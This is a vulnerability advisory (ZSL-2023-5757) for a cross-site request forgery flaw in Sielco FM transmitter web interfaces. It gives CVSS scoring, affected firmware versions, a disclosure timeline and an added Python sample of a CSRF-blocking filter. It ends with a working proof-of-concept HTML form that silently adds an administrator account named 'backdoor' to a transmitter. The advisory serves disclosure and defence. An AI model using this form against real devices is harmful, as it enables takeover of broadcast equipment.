zeroscience / Gjoko Krstic / ZSL-2023-5757
Mar 28, 2023 - 12:00 a.m.

Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery

2023-03-28 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score: 8.6 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 24.3%)

Title: Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
Advisory ID: ZSL-2023-5757
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 28.03.2023

Summary

Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Description

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
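
The validity checks that the description says are missing, sketched as a filter a reverse proxy in front of the management interface could apply. This is an added example, not part of the advisory or of the vendor firmware. The `csrf_token` field, the secret, the session id and the sample origins are assumptions made for illustration; the host name `transmitter` and the path `/protect/users.htm` are taken from the PoC.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
ALLOWED_ORIGIN = "http://transmitter"  # host name used in the advisory's PoC


def issue_token(secret, session_id):
    """Per-session token, embedded only in forms served by the device itself."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def source_origin(headers):
    """Origin reported by the browser (Referer as fallback); None if unusable.
    Header names are assumed to be lower-cased by the caller."""
    value = headers.get("origin") or headers.get("referer") or ""
    parts = urlsplit(value)
    if parts.scheme in ("http", "https") and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}".lower()
    return None  # also covers the opaque "Origin: null"


def check_request(method, headers, form, session_id, secret,
                  allowed_origin=ALLOWED_ORIGIN):
    """Return (allowed, reason) for one request to the management interface."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    origin = source_origin(headers)
    if origin is None:
        return False, "no usable Origin or Referer on state-changing request"
    if origin != allowed_origin.lower():
        return False, f"cross-origin request from {origin}"
    expected = issue_token(secret, session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample values, for illustration only.
SECRET = b"constructed-demo-secret"
SESSION = "sess-1234"

if __name__ == "__main__":
    # A form auto-submitted from another site to /protect/users.htm: rejected.
    print(check_request("POST", {"origin": "http://other-site.example"},
                        {"user3": "newuser", "auth3": "2"}, SESSION, SECRET))
    # The device's own form, carrying the session token: accepted.
    own = {"user3": "newuser", "csrf_token": issue_token(SECRET, SESSION)}
    print(check_request("POST", {"referer": "http://transmitter/protect/users.htm"},
                        own, SESSION, SECRET))
```

Either check alone blocks the forged form; the token also covers browsers or intermediaries that strip `Origin` and `Referer`.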

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)

Tested On

lwIP/2.1.1
Web/3.0.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[27.03.2023] No response from the vendor.
[27.03.2023] No response from the CSIRT team.
[28.03.2023] Public security advisory released.

PoC

sielco_fm_csrf.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/51364>
[2] <https://packetstormsecurity.com/files/171838/>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253076>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269707>
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-45317>
[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-45317>

Changelog

[28.03.2023] - Initial release
[02.11.2023] - Added reference [1], [2], [3], [4], [5], [6] and [7]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--

Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php


26.01.2023

--><html><body><p>CSRF Add Admin:
---------------


  </p>
<form action="http://transmitter/protect/users.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value=""/>
<input name="pwd1" type="hidden" value=""/>
<input name="pwd1bis" type="hidden" value=""/>
<input name="auth1" type="hidden" value=""/>
<input name="user2" type="hidden" value=""/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value=""/>
<input name="user3" type="hidden" value="backdoor"/>
<input name="pwd3" type="hidden" value="backdoor123"/>
<input name="pwd3bis" type="hidden" value="backdoor123"/>
<input name="auth3" type="hidden" value="2"/>
<input type="submit" value="Adminize!"/>
</form>
</body></html>
